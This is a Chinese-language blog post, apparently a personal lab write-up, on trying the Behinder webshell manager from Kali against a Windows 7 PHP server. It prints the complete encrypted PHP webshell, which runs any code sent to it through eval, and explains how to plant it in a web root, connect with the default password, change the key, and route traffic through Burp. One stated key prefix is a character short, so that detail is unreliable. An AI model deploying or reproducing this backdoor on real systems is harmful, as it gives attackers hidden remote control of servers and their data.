PJzhang:冰蠍webshell管理工具試用

貓寧~~~

操作系統kali linux 

https://github.com/rebeyond/Behinder
https://github.com/rebeyond/Behinder/releases
https://github.com/rebeyond/Behinder/releases/download/Behinder_v3.0_Beta_6/Behinder_v3.0_Beta_6_linux.zip

打開冰蠍客戶端
java -jar /root/Desktop/Behinder_v3.0_Beta_6_linux/Behinder_v3.0_Beta6_linux.jar

kali linux系統IP 10.108.18.98

windows 7系統IP 10.108.18.99

windows 7採用phpstudy啓用wamp

使用server文件夾中的shell.php

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //該密鑰爲連接密碼32位md5值的前16位，默認連接密碼rebeyond
    $_SESSION['k']=$key;
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");
        
        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; 
                }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

shell.php在C:\phpstudy_pro\WWW下重命名爲xiaozhupeiqi.php

http://10.108.18.99/xiaozhupeiqi.php

點擊空白，右鍵新增，輸入URL和默認密碼rebeyond

連接成功

基本信息是一個phpinfo，還有命令執行，虛擬終端，文件管理，其中內網穿透功能可以試試。

rebeyond進行md5加密爲e45e329feb5d925ba3f549b17b4b3dde

前16位是45e329feb5d925b

如果想要修改密碼，只需要將自定義密碼md5加密之後的前16位替換一下就OK

例如xiaozhupeiqi，md5加密，620157faf8ab159f0bc80ad0a8f42b68，前16位620157faf8ab159f

可以連接成功

md5加解密可以用這個網站

https://www.cmd5.com/hash.aspx

代理設置127.0.0.1 8081 http，burpsuite proxy的options對應設置，可以通過測試抓取流量

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36

除了支持php木馬，還支持asp，aspx，jsp木馬。

over~~~